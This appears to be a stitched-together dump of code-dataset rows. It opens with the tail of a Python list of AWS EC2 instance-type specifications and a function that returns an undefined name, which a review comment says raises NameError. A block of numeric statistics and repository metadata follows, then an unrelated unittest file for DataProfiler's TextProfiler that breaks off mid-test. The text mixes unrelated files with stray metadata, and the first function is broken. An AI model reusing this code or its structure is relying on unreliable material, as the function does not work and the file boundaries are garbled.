'NetworkPerformance': '12 Gigabit', 'MaximumNetworkInterfaces': 8}], 'Ipv4AddressesPerInterface': 30, 'Ipv6AddressesPerInterface': 30, 'Ipv6Supported': True, 'EnaSupport': 'required', 'EfaSupported': False, 'EncryptionInTransitSupported': False}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': True, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': False, 'AutoRecoverySupported': True, 'SupportedBootModes': ['legacy-bios', 'uefi']}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.6, 'DefaultVCpus': 48, 'DefaultCores': 24, 'DefaultThreadsPerCore': 2, 'ValidCores': [2, 4, 6, 8, 10, 12, 14, 16, 18, 20, 22, 24], 'ValidThreadsPerCore': [1, 2], 'SizeInMiB': 98304, 'TotalSizeInGB': 1800, 'Disks': [{'SizeInGB': 900, 'Count': 2, 'Type': 'ssd'}], 'NvmeSupport': 'required', 'EncryptionSupport': 'supported', 'EbsOptimizedSupport': 'default', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 9500, 'BaselineThroughputInMBps': 1187.5, 'BaselineIops': 40000, 'MaximumBandwidthInMbps': 9500, 'MaximumThroughputInMBps': 1187.5, 'MaximumIops': 40000}, 'NetworkPerformance': '12 Gigabit', 'MaximumNetworkInterfaces': 8, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': '12 Gigabit', 'MaximumNetworkInterfaces': 8}], 'Ipv4AddressesPerInterface': 30, 'Ipv6AddressesPerInterface': 30, 'Ipv6Supported': True, 'EnaSupport': 'required', 'EfaSupported': False, 'EncryptionInTransitSupported': False, 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'c5d.12xlarge', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'SupportedVirtualizationTypes': ['hvm'], 'BareMetal': False, 'Hypervisor': 'nitro', 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.6}, 'VCpuInfo': {'DefaultVCpus': 48, 
'DefaultCores': 24, 'DefaultThreadsPerCore': 2, 'ValidCores': [2, 4, 6, 8, 10, 12, 14, 16, 18, 20, 22, 24], 'ValidThreadsPerCore': [1, 2]}, 'MemoryInfo': {'SizeInMiB': 98304}, 'InstanceStorageSupported': True, 'InstanceStorageInfo': {'TotalSizeInGB': 1800, 'Disks': [{'SizeInGB': 900, 'Count': 2, 'Type': 'ssd'}], 'NvmeSupport': 'required', 'EncryptionSupport': 'required'}, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 9500, 'BaselineThroughputInMBps': 1187.5, 'BaselineIops': 40000, 'MaximumBandwidthInMbps': 9500, 'MaximumThroughputInMBps': 1187.5, 'MaximumIops': 40000}, 'NvmeSupport': 'required'}, 'NetworkInfo': {'NetworkPerformance': '12 Gigabit', 'MaximumNetworkInterfaces': 8, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': '12 Gigabit', 'MaximumNetworkInterfaces': 8}], 'Ipv4AddressesPerInterface': 30, 'Ipv6AddressesPerInterface': 30, 'Ipv6Supported': True, 'EnaSupport': 'required', 'EfaSupported': False, 'EncryptionInTransitSupported': False}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': True, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': False, 'AutoRecoverySupported': False, 'SupportedBootModes': ['legacy-bios', 'uefi']}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.4, 'DefaultVCpus': 72, 'DefaultCores': 36, 'DefaultThreadsPerCore': 2, 'ValidCores': [4, 6, 8, 10, 12, 14, 16, 18, 20, 22, 24, 26, 28, 30, 32, 34, 36], 'ValidThreadsPerCore': [1, 2], 'SizeInMiB': 147456, 'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 19000, 'BaselineThroughputInMBps': 2375.0, 'BaselineIops': 80000, 'MaximumBandwidthInMbps': 19000, 'MaximumThroughputInMBps': 2375.0, 'MaximumIops': 80000}, 'NvmeSupport': 'required', 'NetworkPerformance': '25 Gigabit', 
'MaximumNetworkInterfaces': 15, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': '25 Gigabit', 'MaximumNetworkInterfaces': 15}], 'Ipv4AddressesPerInterface': 50, 'Ipv6AddressesPerInterface': 50, 'Ipv6Supported': True, 'EnaSupport': 'required', 'EfaSupported': False, 'EncryptionInTransitSupported': False, 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'c5.18xlarge', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'SupportedVirtualizationTypes': ['hvm'], 'BareMetal': False, 'Hypervisor': 'nitro', 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.4}, 'VCpuInfo': {'DefaultVCpus': 72, 'DefaultCores': 36, 'DefaultThreadsPerCore': 2, 'ValidCores': [4, 6, 8, 10, 12, 14, 16, 18, 20, 22, 24, 26, 28, 30, 32, 34, 36], 'ValidThreadsPerCore': [1, 2]}, 'MemoryInfo': {'SizeInMiB': 147456}, 'InstanceStorageSupported': False, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 19000, 'BaselineThroughputInMBps': 2375.0, 'BaselineIops': 80000, 'MaximumBandwidthInMbps': 19000, 'MaximumThroughputInMBps': 2375.0, 'MaximumIops': 80000}, 'NvmeSupport': 'required'}, 'NetworkInfo': {'NetworkPerformance': '25 Gigabit', 'MaximumNetworkInterfaces': 15, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': '25 Gigabit', 'MaximumNetworkInterfaces': 15}], 'Ipv4AddressesPerInterface': 50, 'Ipv6AddressesPerInterface': 50, 'Ipv6Supported': True, 'EnaSupport': 'required', 'EfaSupported': False, 'EncryptionInTransitSupported': False}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': True, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': True, 'AutoRecoverySupported': 
True, 'SupportedBootModes': ['legacy-bios', 'uefi']}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.4, 'DefaultVCpus': 72, 'DefaultCores': 36, 'DefaultThreadsPerCore': 2, 'ValidCores': [4, 6, 8, 10, 12, 14, 16, 18, 20, 22, 24, 26, 28, 30, 32, 34, 36], 'ValidThreadsPerCore': [1, 2], 'SizeInMiB': 147456, 'TotalSizeInGB': 1800, 'Disks': [{'SizeInGB': 900, 'Count': 2, 'Type': 'ssd'}], 'NvmeSupport': 'required', 'EncryptionSupport': 'supported', 'EbsOptimizedSupport': 'default', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 19000, 'BaselineThroughputInMBps': 2375.0, 'BaselineIops': 80000, 'MaximumBandwidthInMbps': 19000, 'MaximumThroughputInMBps': 2375.0, 'MaximumIops': 80000}, 'NetworkPerformance': '25 Gigabit', 'MaximumNetworkInterfaces': 15, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': '25 Gigabit', 'MaximumNetworkInterfaces': 15}], 'Ipv4AddressesPerInterface': 50, 'Ipv6AddressesPerInterface': 50, 'Ipv6Supported': True, 'EnaSupport': 'required', 'EfaSupported': False, 'EncryptionInTransitSupported': False, 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'c5d.18xlarge', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'SupportedVirtualizationTypes': ['hvm'], 'BareMetal': False, 'Hypervisor': 'nitro', 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.4}, 'VCpuInfo': {'DefaultVCpus': 72, 'DefaultCores': 36, 'DefaultThreadsPerCore': 2, 'ValidCores': [4, 6, 8, 10, 12, 14, 16, 18, 20, 22, 24, 26, 28, 30, 32, 34, 36], 'ValidThreadsPerCore': [1, 2]}, 'MemoryInfo': {'SizeInMiB': 147456}, 'InstanceStorageSupported': True, 'InstanceStorageInfo': {'TotalSizeInGB': 1800, 'Disks': [{'SizeInGB': 900, 'Count': 2, 'Type': 'ssd'}], 'NvmeSupport': 'required', 'EncryptionSupport': 'required'}, 'EbsInfo': {'EbsOptimizedSupport': 'default', 
'EncryptionSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 19000, 'BaselineThroughputInMBps': 2375.0, 'BaselineIops': 80000, 'MaximumBandwidthInMbps': 19000, 'MaximumThroughputInMBps': 2375.0, 'MaximumIops': 80000}, 'NvmeSupport': 'required'}, 'NetworkInfo': {'NetworkPerformance': '25 Gigabit', 'MaximumNetworkInterfaces': 15, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': '25 Gigabit', 'MaximumNetworkInterfaces': 15}], 'Ipv4AddressesPerInterface': 50, 'Ipv6AddressesPerInterface': 50, 'Ipv6Supported': True, 'EnaSupport': 'required', 'EfaSupported': False, 'EncryptionInTransitSupported': False}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': True, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': True, 'AutoRecoverySupported': False, 'SupportedBootModes': ['legacy-bios', 'uefi']}] # noqa: E501
def get_instances_list() -> list:
    '''Returns list EC2 instances with HibernationSupported = True .'''
    # pylint: disable=all
    # NOTE(review): the name 'get' is not defined anywhere in the visible code.
    # It appears to be a truncated reference (presumably the module-level list
    # of EC2 instance-type dicts defined above this function) — confirm against
    # the full file; as written this raises NameError at call time.
    return get
| 21,818.833333
| 261,626
| 0.742707
| 20,085
| 261,826
| 9.671695
| 0.013791
| 0.047237
| 0.028993
| 0.045754
| 0.998059
| 0.998008
| 0.997601
| 0.995907
| 0.995521
| 0.99461
| 0
| 0.050392
| 0.072682
| 261,826
| 11
| 261,627
| 23,802.363636
| 0.749687
| 0.000523
| 0
| 0
| 1
| 0
| 0.683631
| 0.294934
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| false
| 0
| 0
| 0
| 0.666667
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 12
|
48a18149d76754d299f9c952d925081693a417a1
| 24,053
|
py
|
Python
|
dataprofiler/tests/profilers/test_unstructured_text_profile.py
|
az85252/DataProfiler
|
1303abe04b48fa87c67d8d9b3a13f8cb88e79afb
|
[
"Apache-2.0"
] | null | null | null |
dataprofiler/tests/profilers/test_unstructured_text_profile.py
|
az85252/DataProfiler
|
1303abe04b48fa87c67d8d9b3a13f8cb88e79afb
|
[
"Apache-2.0"
] | null | null | null |
dataprofiler/tests/profilers/test_unstructured_text_profile.py
|
az85252/DataProfiler
|
1303abe04b48fa87c67d8d9b3a13f8cb88e79afb
|
[
"Apache-2.0"
] | null | null | null |
import unittest
import pandas as pd
from dataprofiler.profilers.unstructured_text_profile import TextProfiler
from dataprofiler.profilers.profiler_options import TextProfilerOptions
class TestUnstructuredTextProfile(unittest.TestCase):
    """Unit tests for ``TextProfiler``.

    Covers: name/sample-size bookkeeping, vocab and word/word-count tracking,
    timing metrics, profile merging (including case-sensitivity conflicts and
    top-k merging rules), and behavior under ``TextProfilerOptions``.
    """

    def test_text_profile_update_and_name(self):
        """The profiler keeps the name it was constructed with after updates."""
        text_profile = TextProfiler("Name")
        sample = pd.Series(["Hello my name is: Grant.!!!",
                            "Bob and \"Grant\", 'are' friends"])
        text_profile.update(sample)
        self.assertEqual("Name", text_profile.name)

    def test_vocab(self):
        """Vocab accumulates the distinct characters across successive updates."""
        text_profile = TextProfiler("Name")
        sample = pd.Series(["Hello my name is: Grant.!!!",
                            "Bob and \"Grant\", 'are' friends"])
        text_profile.update(sample)
        profile = text_profile.profile

        # Assert vocab is correct
        expected_vocab = [' ', '!', '"', "'", ',', '.', ':', 'B', 'G', 'H',
                          'a', 'b', 'd', 'e', 'f', 'i', 'l', 'm', 'n', 'o',
                          'r', 's', 't', 'y']
        self.assertListEqual(sorted(expected_vocab), sorted(profile['vocab']))

        # Update the data again
        sample = pd.Series(["Grant knows how to code",
                            "Grant will code with Bob"])
        text_profile.update(sample)
        profile = text_profile.profile

        # Assert vocab is correct
        expected_vocab = [' ', '!', '"', "'", ',', '.', ':', 'B', 'G', 'H',
                          'a', 'b', 'c', 'd', 'e', 'f', 'h', 'i', 'k', 'l',
                          'm', 'n', 'o', 'r', 's', 't', 'w', 'y']
        self.assertListEqual(sorted(expected_vocab), sorted(profile['vocab']))

    def test_words_and_word_count(self):
        """Words/word counts accumulate across updates and exclude stop words."""
        text_profile = TextProfiler("Name")
        sample = pd.Series(["Hello my name is: Grant.!!!",
                            "Bob and \"Grant\", 'are' friends"])
        text_profile.update(sample)
        profile = text_profile.profile

        # Assert words is correct and stop words are not present
        expected_words = ['Hello', 'name', 'Grant', 'Bob', 'friends']
        self.assertListEqual(expected_words, profile['words'])
        self.assertNotIn("is", profile['words'])

        # Assert word counts are correct
        expected_word_count = {'Hello': 1, 'name': 1, 'Grant': 2, 'Bob': 1,
                               'friends': 1}
        self.assertDictEqual(expected_word_count, profile['word_count'])

        # Update the data again
        sample = pd.Series(["Grant knows how to code",
                            "Grant will code with Bob"])
        text_profile.update(sample)
        profile = text_profile.profile

        # Assert words is correct and stop words are not present
        expected_words = ['Hello', 'name', 'Grant', 'Bob', 'friends', 'knows',
                          'code']
        self.assertListEqual(expected_words, profile['words'])
        self.assertNotIn("with", profile['words'])

        # Assert word counts are correct
        expected_word_count = {'Hello': 1, 'name': 1, 'Grant': 4, 'Bob': 2,
                               'friends': 1, 'knows': 1, 'code': 2}
        self.assertDictEqual(expected_word_count, profile['word_count'])

    def test_sample_size(self):
        """sample_size counts the total number of samples seen so far."""
        text_profile = TextProfiler("Name")
        sample = pd.Series(["Hello my name is: Grant.!!!",
                            "Bob and \"Grant\", 'are' friends"])
        text_profile.update(sample)

        # Assert sample size is accurate
        self.assertEqual(2, text_profile.sample_size)

        # Update the data again
        sample = pd.Series(["Grant knows how to code",
                            "Grant will code with Bob"])
        text_profile.update(sample)

        # Assert sample size is accurate
        self.assertEqual(4, text_profile.sample_size)

    def test_timing(self):
        """Per-metric timing entries are recorded in the profile."""
        text_profile = TextProfiler("Name")
        sample = pd.Series(["Hello my name is: Grant.!!!",
                            "Bob and \"Grant\", 'are' friends"])
        text_profile.update(sample)
        profile = text_profile.profile

        # Assert timing is occurring
        self.assertIn("vocab", profile["times"])
        self.assertIn("words", profile["times"])

    def test_merge_profiles(self):
        """Adding two profilers merges name, counts, vocab, words, and times."""
        text_profile1 = TextProfiler("Name")
        sample = pd.Series(["Hello my name is: Grant.!!!"])
        text_profile1.update(sample)

        text_profile2 = TextProfiler("Name")
        sample = pd.Series(["Bob and \"Grant\", 'are' friends"])
        text_profile2.update(sample)

        text_profile3 = text_profile1 + text_profile2
        profile = text_profile3.profile
        self.assertEqual("Name", text_profile3.name)

        # Assert sample size is accurate
        self.assertEqual(2, text_profile3.sample_size)

        # Assert vocab is correct
        expected_vocab = [' ', '!', '"', "'", ',', '.', ':', 'B', 'G', 'H',
                          'a', 'b', 'd', 'e', 'f', 'i', 'l', 'm', 'n', 'o',
                          'r', 's', 't', 'y']
        self.assertListEqual(sorted(expected_vocab), sorted(profile['vocab']))

        # Assert words is correct and stop words are not present
        expected_words = ['Bob', 'Grant', 'friends', 'Hello', 'name']
        self.assertCountEqual(expected_words, profile['words'])
        self.assertNotIn("is", profile['words'])

        # Assert word counts are correct
        expected_word_count = {'Hello': 1, 'name': 1, 'Grant': 2, 'Bob': 1,
                               'friends': 1}
        self.assertDictEqual(expected_word_count, profile['word_count'])

        # Assert timing is occurring
        self.assertIn("vocab", profile["times"])
        self.assertIn("words", profile["times"])

    def test_case_sensitivity(self):
        """Merging profiles with conflicting case sensitivity warns and
        lower-cases the merged word counts, regardless of merge order."""
        text_profile1 = TextProfiler("Name")
        text_profile1._is_case_sensitive = False
        sample = pd.Series(["Hello my name is: Grant.!!!"])
        text_profile1.update(sample)
        profile = text_profile1.profile
        expected_word_count = {'grant': 1, 'hello': 1, 'name': 1}
        self.assertDictEqual(expected_word_count, profile['word_count'])

        text_profile2 = TextProfiler("Name")
        sample = pd.Series(["Bob and \"Grant\", 'are' friends"])
        text_profile2.update(sample)
        profile = text_profile2.profile
        expected_word_count = {'Grant': 1, 'Bob': 1, 'friends': 1}
        self.assertDictEqual(expected_word_count, profile['word_count'])

        with self.assertWarnsRegex(UserWarning,
                                   "The merged Text Profile will not be case sensitive since there"
                                   " were conflicting values for case sensitivity between the two "
                                   "profiles being merged."):
            text_profile3 = text_profile1 + text_profile2
            profile = text_profile3.profile
            # Assert word counts are correct
            expected_word_count = {'hello': 1, 'name': 1, 'grant': 2, 'bob': 1,
                                   'friends': 1}
            self.assertDictEqual(expected_word_count, profile['word_count'])

        # change the merge order
        with self.assertWarnsRegex(UserWarning,
                                   "The merged Text Profile will not be case sensitive since there"
                                   " were conflicting values for case sensitivity between the two "
                                   "profiles being merged."):
            text_profile3 = text_profile2 + text_profile1
            profile = text_profile3.profile
            # Assert word counts are correct
            expected_word_count = {'hello': 1, 'name': 1, 'grant': 2, 'bob': 1,
                                   'friends': 1}
            self.assertDictEqual(expected_word_count, profile['word_count'])

    def test_merge_most_common_chars_count(self):
        """Merged vocab_count honors each profile's _top_k_chars setting."""
        ### default values of most common chars for both profiles
        text_profile1 = TextProfiler("Name")
        sample1 = pd.Series(["this is test,", " this is a test sentence"])
        text_profile1.update(sample1)

        text_profile2 = TextProfiler("Name")
        sample2 = pd.Series(["this is", "this"])
        text_profile2.update(sample2)

        text_profile3 = text_profile1 + text_profile2
        profile = text_profile3.profile
        # as merged profile's vocab_count length is None, it is set to
        # the length of the merged vocab_count, which is 10
        expected_vocab_count = {'s': 10, 't': 9, ' ': 8, 'i': 7, 'e': 5,
                                'h': 4, 'n': 2, ',': 1, 'a': 1, 'c': 1}
        self.assertDictEqual(expected_vocab_count, profile["vocab_count"])

        ### one profile has default values of most common chars
        ### the other profile has it set
        text_profile1._top_k_chars = 3
        text_profile3 = text_profile1 + text_profile2
        profile = text_profile3.profile
        # as merged profile's vocab_count length is None, it is set to
        # the length of the merged vocab_count, which is 10
        expected_vocab_count = {'s': 10, 't': 9, ' ': 8, 'i': 7, 'e': 5,
                                'h': 4, 'n': 2, ',': 1, 'a': 1, 'c': 1}
        self.assertDictEqual(expected_vocab_count, profile["vocab_count"])

        ### equal number of most common chars
        text_profile1._top_k_chars = 3
        text_profile2._top_k_chars = 3
        text_profile3 = text_profile1 + text_profile2
        profile = text_profile3.profile
        expected_vocab_count = {'s': 10, 't': 9, ' ': 8}
        self.assertDictEqual(expected_vocab_count, profile["vocab_count"])

        ### different number of most common chars
        text_profile1._top_k_chars = 2
        text_profile2._top_k_chars = 3
        text_profile3 = text_profile1 + text_profile2
        profile = text_profile3.profile
        expected_vocab_count = {'s': 10, 't': 9, ' ': 8}
        self.assertDictEqual(expected_vocab_count, profile["vocab_count"])

    def test_merge_most_common_words_count(self):
        """Merged word_count honors each profile's _top_k_words setting."""
        ### default values of most common words for both profiles
        text_profile1 = TextProfiler("Name")
        text_profile1._stop_words = set()  # set stop_words to empty for easy inspection
        sample1 = pd.Series(["this is test,", " this is a test sentence"])
        text_profile1.update(sample1)

        text_profile2 = TextProfiler("Name")
        text_profile2._stop_words = set()  # set stop_words to empty for easy inspection
        sample2 = pd.Series(["this is", "this"])
        text_profile2.update(sample2)

        text_profile3 = text_profile1 + text_profile2
        profile = text_profile3.profile
        # as merged profile's word_count length is None, it is set to
        # the length of the merged word_count, which is 5
        expected_word_count = {'this': 4, 'is': 3, 'test': 2, 'a': 1, 'sentence': 1}
        self.assertDictEqual(expected_word_count, profile["word_count"])

        ### one profile has default values of most common words
        ### the other profile has it set
        text_profile1._top_k_words = 3
        text_profile3 = text_profile1 + text_profile2
        profile = text_profile3.profile
        # as merged profile's word_count length is None, it is set to
        # the length of the merged word_count, which is 5
        expected_word_count = {'this': 4, 'is': 3, 'test': 2, 'a': 1, 'sentence': 1}
        self.assertDictEqual(expected_word_count, profile["word_count"])

        ### equal number of most common words
        text_profile1._top_k_words = 3
        text_profile2._top_k_words = 3
        text_profile3 = text_profile1 + text_profile2
        profile = text_profile3.profile
        expected_word_count = {'this': 4, 'is': 3, 'test': 2}
        self.assertDictEqual(expected_word_count, profile["word_count"])

        ### different number of most common words
        text_profile1._top_k_words = 2
        text_profile2._top_k_words = 3
        text_profile3 = text_profile1 + text_profile2
        profile = text_profile3.profile
        expected_word_count = {'this': 4, 'is': 3, 'test': 2}
        self.assertDictEqual(expected_word_count, profile["word_count"])

    def test_text_profile_with_wrong_options(self):
        """A non-TextProfilerOptions `options` argument raises ValueError."""
        with self.assertRaisesRegex(ValueError,
                                    "TextProfiler parameter 'options' must be of type"
                                    " TextProfilerOptions."):
            TextProfiler("Name", options="wrong_data_type")

    def test_options_default(self):
        """Default options: case-sensitive words, full vocab counts."""
        options = TextProfilerOptions()

        # input with one sample
        text_profile = TextProfiler("Name", options=options)
        sample = pd.Series(["This is test, a Test sentence.!!!"])
        text_profile.update(sample)
        expected_word_count = {'sentence': 1, 'Test': 1, 'test': 1}
        expected_vocab = {'s': 5, ' ': 5, 'e': 5, 't': 4, '!': 3, 'T': 2,
                          'i': 2, 'n': 2, 'h': 1, ',': 1, 'a': 1, 'c': 1, '.': 1}
        self.assertDictEqual(expected_word_count, text_profile.word_count)
        self.assertDictEqual(expected_vocab, text_profile.vocab_count)

        # input with two samples
        text_profile = TextProfiler("Name", options=options)
        sample = pd.Series(["This is test,", " a Test sentence.!!!"])
        text_profile.update(sample)
        expected_word_count = {'sentence': 1, 'Test': 1, 'test': 1}
        expected_vocab = {'s': 5, ' ': 5, 'e': 5, 't': 4, '!': 3, 'T': 2,
                          'i': 2, 'n': 2, 'h': 1, ',': 1, 'a': 1, 'c': 1, '.': 1}
        self.assertDictEqual(expected_word_count, text_profile.word_count)
        self.assertDictEqual(expected_vocab, text_profile.vocab_count)

    def test_options_case_sensitive(self):
        """is_case_sensitive=False folds words to lower case; vocab unchanged."""
        # change is_case_sensitive, other options remain the same as default values
        options = TextProfilerOptions()
        options.is_case_sensitive = False

        # input with one sample
        text_profile = TextProfiler("Name", options=options)
        sample = pd.Series(["This is test, a Test sentence.!!!"])
        text_profile.update(sample)
        expected_word_count = {'sentence': 1, 'test': 2}
        expected_vocab = {'s': 5, ' ': 5, 'e': 5, 't': 4, '!': 3, 'T': 2,
                          'i': 2, 'n': 2, 'h': 1, ',': 1, 'a': 1, 'c': 1, '.': 1}
        self.assertDictEqual(expected_word_count, text_profile.word_count)
        self.assertDictEqual(expected_vocab, text_profile.vocab_count)

        # input with two samples
        text_profile = TextProfiler("Name", options=options)
        sample = pd.Series(["This is test,", " a Test sentence.!!!"])
        text_profile.update(sample)
        expected_word_count = {'sentence': 1, 'test': 2}
        expected_vocab = {'s': 5, ' ': 5, 'e': 5, 't': 4, '!': 3, 'T': 2,
                          'i': 2, 'n': 2, 'h': 1, ',': 1, 'a': 1, 'c': 1, '.': 1}
        self.assertDictEqual(expected_word_count, text_profile.word_count)
        self.assertDictEqual(expected_vocab, text_profile.vocab_count)

    def test_options_stop_words(self):
        """Custom stop_words list (and empty list) controls word filtering."""
        # change stop_words, other options remain the same as default values

        # with a list of stopwords
        options = TextProfilerOptions()
        options.stop_words = ['hello', 'sentence', 'is', 'a']

        ## input with one sample
        text_profile = TextProfiler("Name", options=options)
        sample = pd.Series(["This is test, a Test sentence.!!!"])
        text_profile.update(sample)
        expected_word_count = {'This': 1, 'Test': 1, 'test': 1}
        expected_vocab = {'s': 5, ' ': 5, 'e': 5, 't': 4, '!': 3, 'T': 2,
                          'i': 2, 'n': 2, 'h': 1, ',': 1, 'a': 1, 'c': 1, '.': 1}
        self.assertDictEqual(expected_word_count, text_profile.word_count)
        self.assertDictEqual(expected_vocab, text_profile.vocab_count)

        ## input with two samples
        text_profile = TextProfiler("Name", options=options)
        sample = pd.Series(["This is test,", " a Test sentence.!!!"])
        text_profile.update(sample)
        expected_word_count = {'This': 1, 'Test': 1, 'test': 1}
        expected_vocab = {'s': 5, ' ': 5, 'e': 5, 't': 4, '!': 3, 'T': 2,
                          'i': 2, 'n': 2, 'h': 1, ',': 1, 'a': 1, 'c': 1, '.': 1}
        self.assertDictEqual(expected_word_count, text_profile.word_count)
        self.assertDictEqual(expected_vocab, text_profile.vocab_count)

        # with an empty list
        options = TextProfilerOptions()
        options.stop_words = []

        ## input with one sample
        text_profile = TextProfiler("Name", options=options)
        sample = pd.Series(["This is test, a Test sentence.!!!"])
        text_profile.update(sample)
        expected_word_count = {'This': 1, 'is': 1, 'test': 1, 'a': 1,
                               'Test': 1, 'sentence': 1}
        expected_vocab = {'s': 5, ' ': 5, 'e': 5, 't': 4, '!': 3, 'T': 2,
                          'i': 2, 'n': 2, 'h': 1, ',': 1, 'a': 1, 'c': 1, '.': 1}
        self.assertDictEqual(expected_word_count, text_profile.word_count)
        self.assertDictEqual(expected_vocab, text_profile.vocab_count)

        ## input with two samples
        text_profile = TextProfiler("Name", options=options)
        sample = pd.Series(["This is test,", " a Test sentence.!!!"])
        text_profile.update(sample)
        expected_word_count = {'This': 1, 'is': 1, 'test': 1, 'a': 1,
                               'Test': 1, 'sentence': 1}
        expected_vocab = {'s': 5, ' ': 5, 'e': 5, 't': 4, '!': 3, 'T': 2,
                          'i': 2, 'n': 2, 'h': 1, ',': 1, 'a': 1, 'c': 1, '.': 1}
        self.assertDictEqual(expected_word_count, text_profile.word_count)
        self.assertDictEqual(expected_vocab, text_profile.vocab_count)

    def test_options_vocab_update(self):
        """vocab.is_enabled=False leaves vocab_count empty."""
        # change vocab.is_enabled, other options remain the same as default values
        options = TextProfilerOptions()
        options.vocab.is_enabled = False

        # input with one sample
        text_profile = TextProfiler("Name", options=options)
        sample = pd.Series(["This is test, a Test sentence.!!!"])
        text_profile.update(sample)
        expected_word_count = {'sentence': 1, 'Test': 1, 'test': 1}
        expected_vocab = dict()
        self.assertDictEqual(expected_word_count, text_profile.word_count)
        self.assertDictEqual(expected_vocab, text_profile.vocab_count)

        # input with two samples
        text_profile = TextProfiler("Name", options=options)
        sample = pd.Series(["This is test,", " a Test sentence.!!!"])
        text_profile.update(sample)
        expected_word_count = {'sentence': 1, 'Test': 1, 'test': 1}
        expected_vocab = dict()
        self.assertDictEqual(expected_word_count, text_profile.word_count)
        self.assertDictEqual(expected_vocab, text_profile.vocab_count)

    def test_options_words_update(self):
        """words.is_enabled=False leaves word_count empty."""
        # change words.is_enabled, other options remain the same as default values
        options = TextProfilerOptions()
        options.words.is_enabled = False

        # input with one sample
        text_profile = TextProfiler("Name", options=options)
        sample = pd.Series(["This is test, a Test sentence.!!!"])
        text_profile.update(sample)
        expected_word_count = {}
        expected_vocab = {'s': 5, ' ': 5, 'e': 5, 't': 4, '!': 3, 'T': 2,
                          'i': 2, 'n': 2, 'h': 1, ',': 1, 'a': 1, 'c': 1, '.': 1}
        self.assertDictEqual(expected_word_count, text_profile.word_count)
        self.assertDictEqual(expected_vocab, text_profile.vocab_count)

        # input with two samples
        text_profile = TextProfiler("Name", options=options)
        sample = pd.Series(["This is test,", " a Test sentence.!!!"])
        text_profile.update(sample)
        expected_word_count = {}
        expected_vocab = {'s': 5, ' ': 5, 'e': 5, 't': 4, '!': 3, 'T': 2,
                          'i': 2, 'n': 2, 'h': 1, ',': 1, 'a': 1, 'c': 1, '.': 1}
        self.assertDictEqual(expected_word_count, text_profile.word_count)
        self.assertDictEqual(expected_vocab, text_profile.vocab_count)

    def test_options_most_common_chars_count(self):
        """top_k_chars (None / small / larger than vocab) bounds vocab_count."""
        # None value for number of common chars
        options = TextProfilerOptions()
        options.top_k_chars = None
        text_profile = TextProfiler("Name", options=options)
        sample = pd.Series(["this is test,", " this is a test sentence",
                            "this is", "this"])
        text_profile.update(sample)
        profile = text_profile.profile
        expected_vocab_count = {'s': 10, 't': 9, ' ': 8, 'i': 7, 'e': 5,
                                'h': 4, 'n': 2, ',': 1, 'a': 1, 'c': 1}
        self.assertDictEqual(expected_vocab_count, profile["vocab_count"])

        # set number of common chars to 3
        options.top_k_chars = 3
        text_profile = TextProfiler("Name", options=options)
        sample = pd.Series(["this is test,", " this is a test sentence",
                            "this is", "this"])
        text_profile.update(sample)
        profile = text_profile.profile
        expected_vocab_count = {'s': 10, 't': 9, ' ': 8}
